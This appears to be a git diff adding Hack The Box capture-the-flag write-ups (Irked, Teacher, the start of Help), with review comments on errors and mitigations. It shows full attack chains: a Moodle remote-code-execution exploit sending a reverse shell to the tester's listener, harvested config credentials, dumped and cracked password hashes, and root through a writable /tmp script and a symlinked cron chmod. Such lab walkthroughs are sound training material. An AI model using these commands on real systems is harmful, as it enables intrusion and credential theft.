+ drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
+ drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
+ -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
+ -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
+
+ ircd@irked:/home/djmardov/Documents$ cat user.txt
+ cat user.txt
+ cat: user.txt: Permission denied
+
+ ircd@irked:/home/djmardov/Documents$ cat .backup
+ cat .backup
+ Super elite steg backup pw
+ UPupDOWNdownLRlrBAbaSSss
+
+
+
+The .backup file seems to hint us towards steganography, using the "UPupDOWNdownLRlrBAbaSSss" password. Steganography is the art of hiding information within images, we will use the steghide command onto the irked.jpg image we found earlier on the webpage to see if we can extract any data out of it using the password.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → wget http://10.10.10.117/irked.jpg
+ --2019-12-06 16:34:43-- http://10.10.10.117/irked.jpg
+ Connecting to 10.10.10.117:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 34697 (34K) [image/jpeg]
+ Saving to: ‘irked.jpg’
+
+ irked.jpg 100%[==============================================>] 33.88K --.-KB/s in 0.04s
+
+ 2019-12-06 16:34:43 (811 KB/s) - ‘irked.jpg’ saved [34697/34697]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → steghide extract -sf irked.jpg
+ Enter passphrase:
+ wrote extracted data to "pass.txt".
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → cat pass.txt
+ Kab6h+m+bbp2J:HG
+
+
+
+We seem to have a password to work with ! let's try to escalate privileges to the user djmardov using the su command.
+
+
+ ircd@irked:/home/djmardov/Documents$ su djmardov
+ su djmardov
+ Password: Kab6h+m+bbp2J:HG
+
+ djmardov@irked:~/Documents$ whoami
+ whoami
+ djmardov
+ djmardov@irked:~/Documents$ cat user.txt
+ cat user.txt
+ 4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It worked ! We have been able to print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to elevate our privileges even further we need to poke around the box a little more. Let's list the binaries onto the box to see what we can work with.
+
+
+ djmardov@irked:~/Documents$ find / -perm -u=s -type f 2>/dev/null
+ find / -perm -u=s -type f 2>/dev/null
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
+ /usr/sbin/exim4
+ /usr/sbin/pppd
+ /usr/bin/chsh
+ /usr/bin/procmail
+ /usr/bin/gpasswd
+ /usr/bin/newgrp
+ /usr/bin/at
+ /usr/bin/pkexec
+ /usr/bin/X
+ /usr/bin/passwd
+ /usr/bin/chfn
+ **/usr/bin/viewuser**
+ /sbin/mount.nfs
+ /bin/su
+ /bin/mount
+ /bin/fusermount
+ /bin/ntfs-3g
+ /bin/umount
+
+
+
+the viewuser binary doesn't sound all that common, let's inspect it a little further.
+
+
+ djmardov@irked:/usr/bin$ /usr/bin/viewuser
+ /usr/bin/viewuser
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+ sh: 1: /tmp/listusers: not found
+
+
+The viewuser seems to be trying to execute a non-existant file/script within /tmp called listuser.
+
+
+ djmardov@irked:~$ cd /tmp && ls
+ cd /tmp && ls
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-colord.service-9t1iyd
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-cups.service-j2QDlp
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-rtkit-daemon.service-ZjjCnq
+ vmware-root
+
+
+As we can see, /tmp doesn't contain any file named listuser. Let's try to create a bashscript named "listuser" that could spawn yet another shell, which could have elevated privileges.
+
+
+ djmardov@irked:/tmp$ touch listusers
+ touch listusers
+
+ djmardov@irked:/tmp$ echo '#!/bin/bash' >> listusers
+ echo '#!/bin/bash' >> listusers
+
+ djmardov@irked:/tmp$ echo '/bin/sh' >> listusers
+ echo '/bin/sh' >> listusers
+
+ djmardov@irked:/tmp$ /usr/bin/viewuser
+ /usr/bin/viewuser
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+ sh: 1: /tmp/listusers: Permission denied
+
+
+Now the binary file finds the listusers script , although we need to make it executable ! we will be using the chmod command along with the +x flag.
+
+
+ djmardov@irked:/tmp$ chmod +x listusers
+ chmod +x listusers
+
+ djmardov@irked:/tmp$ /usr/bin/viewuser
+ /usr/bin/viewuser
+
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+
+ # whoami
+ whoami
+ root
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ 8dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It worked ! The binary executed our infected listusers script, and it spawned us a root shell, which gave us the root access.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
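Review bot: the service-detection scan in Part 1 does not match the discovery scan above it: the first run reports `8067/tcp open infi-async`, but the follow-up command is `nmap 10.10.10.117 -sCV -p22,80,111,6697,8097`, so 8067 is never fingerprinted and the output instead shows `8097/tcp closed sac`; the port list in the second command should agree with the first result or the text should explain the discrepancy. Elsewhere in this file: the curl output in Part 2 carries extraction debris (`<****img src=irked.jpg> <****br> ...`) where the literal HTML of the page belongs; the Conclusion says "Here we can see the progress graph :" but no image is linked under it; and the prose has a few slips ("seeem", "non-existant", "bashscript", and "infected listusers script", which reads oddly for a two-line shell script). From a defender's point of view the root cause in Part 3 deserves one explicit sentence: a setuid-root binary shells out to a fixed path under world-writable /tmp (`sh: 1: /tmp/listusers: not found`), which is the misconfiguration to report and fix (no `system()` calls to user-writable paths from privileged code, and drop privileges before spawning a shell), rather than leaving it at "it spawned us a root shell".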
diff --git a/Easy/26.md b/Easy/26.md
new file mode 100644
index 0000000..f7e484d
--- /dev/null
+++ b/Easy/26.md
@@ -0,0 +1,540 @@
+# Teacher Writeup
+
+
+
+## Introduction :
+
+Teacher is an easy Linux box that was released back in December 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → nmap -F 10.10.10.153
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 17:19 CET
+ Nmap scan report for 10.10.10.153
+ Host is up (0.090s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → nmap -sCV -p80 10.10.10.153
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 17:20 CET
+ Nmap scan report for 10.10.10.153
+ Host is up (0.071s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Blackhat highschool
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Browsing to the http://10.10.10.153/ page, we are greeted with the webservice our nmap scan picked up. Let's run a dirbuster scan in order to enumerate which folders are available onto this webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → dirsearch -u http://10.10.10.153/ -e php -x 403 -r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6027
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-06_17-40-41.log
+
+ Target: http://10.10.10.153/
+
+
+
+While the dirsearch scan runs in the background, we will be Navigating to the gallery.html page we see something odd :
+
+
+
+
+ ****λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → curl -sk http://10.10.10.153/gallery.html | grep png <****li> <****a href="#"> <****img src="images/5.png" onerror="console.log('That\'s an F');" alt=""> <****/a> <****/li> <****li> <****a href="#"> <****img src="images/5_2.png" alt=""> <****/a> <****/li> <****li> <****a href="#"> <****img src="images/5_3.png" alt=""> <****/a> <****/li>
+ [...]
+
+Interesting ! there seems to be a problem with the image 5.png. let's download it and see what's up with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → wget http://10.10.10.153/images/5.png
+ --2019-12-06 17:31:30-- http://10.10.10.153/images/5.png
+ Connecting to 10.10.10.153:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 200 [image/png]
+ Saving to: ‘5.png’
+
+ 5.png 100%[============================================>] 200 --.-KB/s in 0s
+
+ 2019-12-06 17:31:31 (8.23 MB/s) - ‘5.png’ saved [200/200]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → file 5.png
+ 5.png: ASCII text
+
+
+That's why the image wasn't working ! it was actually an ASCII text file. Let's print out it's contents using the cat command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → cat 5.png
+ Hi Servicedesk,
+
+ I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
+
+ Could you guys figure out what the last charachter is, or just reset it?
+
+ Thanks,
+ Giovanni
+
+
+
+We seem to have a password to work with: **Th4C00lTheacha** although it seems to be missing the last character according to the message. Creating a wordlist with all the possible passwords with python and then giving it to hydra we get the password **Th4C00lTheacha#**
+
+During this time , our dirsearch scan came back with a few results :
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → dirsearch -u http://10.10.10.153/ -e php -x 403-r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6027
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-06_17-40-41.log
+
+ Target: http://10.10.10.153/
+
+ [17:40:41] Starting:
+
+ [17:41:05] 301 - 310B - /css -> http://10.10.10.153/css/
+ [17:41:10] 301 - 312B - /fonts -> http://10.10.10.153/fonts/
+ [17:41:13] 301 - 313B - /images -> http://10.10.10.153/images/
+ [17:41:13] 200 - 8KB - /index.md
+ [17:41:14] 301 - 317B - /javascript -> http://10.10.10.153/javascript/
+ [17:41:15] 301 - 309B - /js -> http://10.10.10.153/js/
+ [17:41:18] 301 - 313B - /manual -> http://10.10.10.153/manual/
+ [17:41:18] 200 - 626B - /manual/index.md
+ [17:41:19] 301 - 313B - /moodle -> http://10.10.10.153/moodle/
+
+
+ Task Completed
+
+
+
+Dirsearch came back with an interesting result : /moodle
+
+Navigating onto the moodle login page, we are greeted with a login form onto which we'll try our credentials for the user giovanni.
+
+ 
+
+And we are logged in ! now let's see if we can find an exploit for the moodle webservice using the searchsploit command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → searchsploit moodle
+ ------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------ ----------------------------------------
+ Mambo Component Mam-Moodle al | exploits/php/webapps/2064.txt
+ Moodle - Remote Command Execu | exploits/linux/remote/29324.rb
+ Moodle 1.1/1.2 - Cross-Site S | exploits/php/webapps/24071.txt
+ Moodle 1.5.2 - 'moodledata' R | exploits/php/webapps/3508.txt
+ Moodle 1.5/1.6 - '/mod/forum/ | exploits/php/webapps/29284.txt
+ Moodle 1.6dev - SQL Injection | exploits/php/webapps/1312.php
+ Moodle 1.7.1 - 'index.php' Cr | exploits/php/webapps/30261.txt
+ Moodle 1.8.3 - 'install.php' | exploits/php/webapps/31020.txt
+ Moodle 1.8.4 - Remote Code Ex | exploits/php/webapps/6356.php
+ Moodle 1.9.3 - Remote Code Ex | exploits/php/webapps/7437.txt
+ Moodle 1.x - 'post.php' Cross | exploits/php/webapps/24356.txt
+ Moodle 2.0.1 - 'PHPCOVERAGE_H | exploits/php/webapps/35297.txt
+ Moodle 2.3.8/2.4.5 - Multiple | exploits/php/webapps/28174.txt
+ Moodle 2.5.9/2.6.8/2.7.5/2.8. | exploits/php/webapps/36418.txt
+ Moodle 2.7 - Persistent Cross | exploits/php/webapps/34169.txt
+ Moodle 2.x/3.x - SQL Injectio | exploits/php/webapps/41828.php
+ **Moodle 3.4.1 - Remote Code Ex | exploits/php/webapps/46551.php**
+ Moodle 3.6.3 - 'Install Plugi | exploits/php/remote/46775.rb
+ Moodle < 1.6.9/1.7.7/1.8.9/1. | exploits/php/webapps/8297.txt
+ Moodle Blog 1.18.2.2/1.6.2 Mo | exploits/php/webapps/28770.txt
+ Moodle Filepicker 3.5.2 - Ser | exploits/php/webapps/47177.txt
+ Moodle Help Script 1.x - Cros | exploits/php/webapps/24279.txt
+ Moodle Jmol Filter 6.1 - Dire | exploits/php/webapps/46881.txt
+ ------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+The php exploit number 46551 seems to be the most recent Remote Code Execution exploit available for our target, let's locate it, and copy it onto our current directory in order to see if we can get it to work.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → locate 46551.php
+ /usr/share/exploitdb/exploits/php/webapps/46551.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → cp /usr/share/exploitdb/exploits/php/webapps/46551.php .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → php 46551.php
+ PHP Notice: Undefined index: url in /home/nihilist/_HTB/Teacher/46551.php on line 503
+ PHP Notice: Undefined index: user in /home/nihilist/_HTB/Teacher/46551.php on line 504
+ PHP Notice: Undefined index: pass in /home/nihilist/_HTB/Teacher/46551.php on line 505
+ PHP Notice: Undefined index: ip in /home/nihilist/_HTB/Teacher/46551.php on line 506
+ PHP Notice: Undefined index: port in /home/nihilist/_HTB/Teacher/46551.php on line 507
+ PHP Notice: Undefined index: course in /home/nihilist/_HTB/Teacher/46551.php on line 508
+
+ *------------------------------*
+ * Noodle [Moodle RCE] (v3.4.1) *
+ *------------------------------*
+
+ [!] Make sure you have a listener
+ [!] at :
+
+ [*] Logging in as user with password
+ [-] LOGIN FAILED!
+ [?] Do you have the right credentials and url?
+
+
+Seems like we need to set the url, user, pass, ip, port and course flags. Before we run it , we will setup another terminal with the nc command ready in order to catch the incoming reverse shell connection onto our 9005th port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → sudo php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass=Th4C00lTheacha# ip=10.10.14.48 port=9005 course=2
+
+
+ [sudo] password for nihilist:
+
+ *------------------------------*
+ * Noodle [Moodle RCE] (v3.4.1) *
+ *------------------------------*
+
+ [!] Make sure you have a listener
+ [!] at 10.10.14.48:9005
+
+ [*] Logging in as user giovanni with password Th4C00lTheacha#
+ [+] Successful Login
+ [>] Moodle Session v3di0tkljnuh8uepnsq5buenf0
+ [>] Moodle Key 4JU4ADDZN7
+ [*] Loading Course ID 2
+ [+] Successfully Loaded Course
+ [*] Enable Editing
+ [+] Successfully Enabled Course Editing
+ [*] Adding Quiz
+ [+] Successfully Added Quiz
+ [*] Configuring New Quiz
+ [+] Successfully Configured Quiz
+ [*] Loading Edit Quiz Page
+ [+] Successfully Loaded Edit Quiz Page
+ [*] Adding Calculated Question
+ [+] Successfully Added Calculation Question
+ [*] Adding Evil Question
+ [+] Successfully Created Evil Question
+ [*] Sending Exploit
+
+ [>] You should receive a reverse shell attempt from the target at 10.10.14.48 on port 9005
+ [>] If connection was successful this program will wait here until you close the connection.
+ [>] You should be able to Ctrl+C and retain the connection through netcat.
+
+
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
+ Connection from 10.10.10.153:41844
+ /bin/sh: 0: can't access tty; job control turned off
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@teacher:/var/www/html/moodle/question$ cat /home/giovanni/user.txt
+ cat /home/giovanni/user.txt
+ cat: /home/giovanni/user.txt: Permission denied
+
+
+And we are logged in ! Although we do not have enough permissions to read the user flag. Looking within the /etc folder we see that there is phpmyadmin, entering the directory we run the grep command with the -r flag onto the dbuser and dbpass file
+
+
+ www-data@teacher:/etc$ cd /etc/phpmyadmin
+ cd /etc/phpmyadmin
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r
+ grep -r
+ Usage: grep [OPTION]... PATTERN [FILE]...
+ Try 'grep --help' for more information.
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r dbuser
+ grep -r dbuser
+ config.inc.php: $cfg['Servers'][$i]['controluser'] = $dbuser;
+ config-db.php:$dbuser='phpmyadmin';
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r dbpass
+ grep -r dbpass
+ config.inc.php: $cfg['Servers'][$i]['controlpass'] = $dbpass;
+ config-db.php:$dbpass='Welkom1!';
+
+
+And we have credentials ! phpmyadmin:Welkom1! let's login onto the local mariaDB service.
+
+
+ www-data@teacher:/etc/phpmyadmin$ mysql -u root -p
+ mysql -u root -p
+ Enter password: Welkom1!
+
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 93
+ Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
+
+ Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+And we are logged into MariaDB ! Now let's see which databases we are able to work with.
+
+
+ MariaDB [(none)]> show databases;
+ show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | moodle |
+ | mysql |
+ | performance_schema |
+ | phpmyadmin |
+ +--------------------+
+ 5 rows in set (0.00 sec)
+
+
+Let's see which tables are contained within the phpmyadmin database.
+
+
+ MariaDB [(none)]> use moodle;
+ use moodle;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ MariaDB [moodle]> show tables;
+ show tables;
+ +----------------------------------+
+ | Tables_in_moodle |
+ +----------------------------------+
+ | mdl_analytics_indicator_calc |
+ | mdl_analytics_models |
+ | mdl_analytics_models_log |
+ | mdl_analytics_predict_samples |
+ | mdl_analytics_prediction_actions |
+ | mdl_analytics_predictions |
+ | mdl_analytics_train_samples |
+ | mdl_analytics_used_analysables |
+ | mdl_analytics_used_files |
+ | mdl_assign |
+
+ [...]
+
+ | **mdl_user** |
+
+ [...]
+
+ | mdl_workshopform_rubric |
+ | mdl_workshopform_rubric_config |
+ | mdl_workshopform_rubric_levels |
+ +----------------------------------+
+ 388 rows in set (0.00 sec)
+
+
+Looking at the results, we get alot of tables to work with, but there is one in particular that we'll be using which is the mdl_user table.
+
+
+ MariaDB [moodle]> select username,password from mdl_user;
+ select username,password from mdl_user;
+ +-------------+--------------------------------------------------------------+
+ | username | password |
+ +-------------+--------------------------------------------------------------+
+ | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
+ | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
+ | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
+ | Giovannibak | 7a860966115182402ed06375cf0a22af |
+ +-------------+--------------------------------------------------------------+
+ 4 rows in set (0.00 sec)
+
+
+There we go ! We have hashed passwords to work with. The last hash is shorter than the others, we'll use hash-identifier in order to see if we can guess the format of the hash.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 7a860966115182402ed06375cf0a22af
+
+ Possible Hashs:
+ [+] MD5
+ [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
+
+
+Looking at the results, we seem to have a MD5 encrypted hash to work with, let's google the hash with the keyword MD5 in order to see if google knows the original password that was there before the md5 hashing.
+
+
+
+And there we have it ! the password was "expelled" Now let's see if we can login as the giovanni user.
+
+
+ www-data@teacher:/etc/phpmyadmin$ su giovanni
+ su giovanni
+ Password: expelled
+
+ giovanni@teacher:/etc/phpmyadmin$ cat /home/giovanni/user.txt
+ cat /home/giovanni/user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we go ! We now have been able to login as giovanni, and therefore we now have enough privileges to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to get the root access, we first start poking around the /usr/bin/ folder and we find something interesting when we grep the result of the ls command with the keyword "backup"
+
+
+ giovanni@teacher:/etc/phpmyadmin$ ls -la /usr/bin | grep backup
+ ls -la /usr/bin | grep backup
+ -rwxr-xr-x 1 root root 138 Jun 27 2018 backup.sh
+ -rwxr-xr-x 1 root root 17879752 Aug 10 2017 mariabackup
+ -rwxr-xr-x 1 root root 32066 Aug 10 2017 wsrep_sst_mariabackup
+ -rwxr-xr-x 1 root root 21662 Aug 10 2017 wsrep_sst_xtrabackup
+ -rwxr-xr-x 1 root root 31670 Aug 10 2017 wsrep_sst_xtrabackup-v2
+
+ giovanni@teacher:/etc/phpmyadmin$ cat /usr/bin/backup.sh
+ cat /usr/bin/backup.sh
+ #!/bin/bash
+ cd /home/giovanni/work;
+ tar -czvf tmp/backup_courses.tar.gz courses/*;
+ cd tmp;
+ tar -xf backup_courses.tar.gz;
+ chmod 777 * -R;
+
+
+It seems like the backup.sh script is being run with root privileges, One important part of the script is that it is running the **chmod 777 *** command within the /tmp folder. Therefore we just have to create a shortcut to the root folder into the /home/giovanni/work/tmp folder, Once the script is being run, we should have access to the root directory and it's contents.
+
+
+ giovanni@teacher:~/work/tmp$ ln -s / caca
+ ln -s / caca
+ giovanni@teacher:~/work/tmp$ ls
+ ls
+ backup_courses.tar.gz caca courses
+ giovanni@teacher:~/work/tmp$ cd /
+ cd /
+ giovanni@teacher:/$ ls -la
+ ls -la
+ total 84
+ drwxr-xr-x 22 root root 4096 Oct 28 2018 .
+ drwxr-xr-x 22 root root 4096 Oct 28 2018 ..
+ drwxr-xr-x 2 root root 4096 Oct 28 2018 bin
+ drwxr-xr-x 3 root root 4096 Oct 28 2018 boot
+ drwxr-xr-x 17 root root 3080 Dec 6 17:19 dev
+ drwxr-xr-x 84 root root 4096 Oct 28 2018 etc
+ drwxr-xr-x 3 root root 4096 Jun 27 2018 home
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img -> boot/initrd.img-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
+ drwxr-xr-x 15 root root 4096 Jun 27 2018 lib
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 lib64
+ drwx------ 2 root root 16384 Jun 27 2018 lost+found
+ drwxr-xr-x 3 root root 4096 Jun 27 2018 media
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 mnt
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 opt
+ dr-xr-xr-x 92 root root 0 Dec 6 17:19 proc
+ drwx------ 3 root root 4096 Nov 4 2018 root
+ drwxr-xr-x 18 root root 500 Dec 6 17:20 run
+ drwxr-xr-x 2 root root 4096 Oct 28 2018 sbin
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 srv
+ dr-xr-xr-x 13 root root 0 Dec 6 18:51 sys
+ drwxrwxrwt 2 root root 4096 Dec 6 18:51 tmp
+ drwxr-xr-x 10 root root 4096 Jun 27 2018 usr
+ drwxr-xr-x 12 root root 4096 Jun 27 2018 var
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64
+ giovanni@teacher:/$
+
+
+Wait a minute for the cronjob to execute the script, which should change every folder to the 777 permissions
+
+
+ drwxrwxrwx 2 root root 4096 Oct 28 2018 bin
+ drwxrwxrwx 3 root root 4096 Oct 28 2018 boot
+ drwxrwxrwx 17 root root 3080 Dec 6 17:19 dev
+ drwxrwxrwx 84 root root 4096 Oct 28 2018 etc
+ drwxrwxrwx 3 root root 4096 Jun 27 2018 home
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img -> boot/initrd.img-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
+ drwxrwxrwx 15 root root 4096 Jun 27 2018 lib
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 lib64
+ drwxrwxrwx 2 root root 16384 Jun 27 2018 lost+found
+ drwxrwxrwx 3 root root 4096 Jun 27 2018 media
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 mnt
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 opt
+ drwxrwxrwx 92 root root 0 Dec 6 17:19 proc
+ drwxrwxrwx 3 root root 4096 Nov 4 2018 root
+ drwxrwxrwx 18 root root 500 Dec 6 17:20 run
+ drwxrwxrwx 2 root root 4096 Oct 28 2018 sbin
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 srv
+ drwxrwxrwx 13 root root 0 Dec 6 18:51 sys
+ drwxrwxrwx 2 root root 4096 Dec 6 18:51 tmp
+ drwxrwxrwx 10 root root 4096 Jun 27 2018 usr
+ drwxrwxrwx 12 root root 4096 Jun 27 2018 var
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64
+
+
+See how every folder has got it's permissions changed , now we should be able to navigate into /root and print out the root flag.
+
+
+ giovanni@teacher:/$ cd root
+ cd root
+ giovanni@teacher:/root$ cat root.txt
+ cat root.txt
+ 4fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we got the root flag now.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
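Review bot: the narration contradicts the commands in two places. "Let's see which tables are contained within the phpmyadmin database" is followed by `use moodle;` / `show tables;`, so the sentence should name the moodle database; and "we have credentials ! phpmyadmin:Welkom1!" is followed by `mysql -u root -p`, so what the writeup actually demonstrates is that the phpMyAdmin control password is reused for the MariaDB root account, which is a separate finding worth stating. Part 3 also says the `chmod 777 *` runs "within the /tmp folder", but `backup.sh` does `cd /home/giovanni/work; ... cd tmp; chmod 777 * -R;`, i.e. the user-owned `/home/giovanni/work/tmp`; that is the whole weakness (a root cron job recursing over a user-writable directory, where the symlink expanded by the glob is dereferenced because it is passed on the command line), and a one-line mitigation (root jobs must not run recursive chmod over paths a user controls, and 777 is never the right mode) would make the section more useful. The hydra step ("Creating a wordlist with all the possible passwords with python and then giving it to hydra we get the password") is asserted without any command shown; either document it or drop the claim. Minor: `-x 403-r` on the second dirsearch line lost a space, the curl line starts with stray `****λ` and `<****li>` residue, and the `` line is an image reference with no path.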
diff --git a/Easy/27.md b/Easy/27.md
new file mode 100644
index 0000000..086b691
--- /dev/null
+++ b/Easy/27.md
@@ -0,0 +1,400 @@
+# Help Writeup
+
+
+
+## Introduction :
+
+Help is an easy Linux box that was released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nmap -F 10.10.10.121 --top-ports 60000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 19:59 CET
+ Nmap scan report for 10.10.10.121
+ Host is up (0.037s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nmap -sCV -p 22,80,3000 10.10.10.121
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 19:59 CET
+ Nmap scan report for 10.10.10.121
+ Host is up (0.030s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
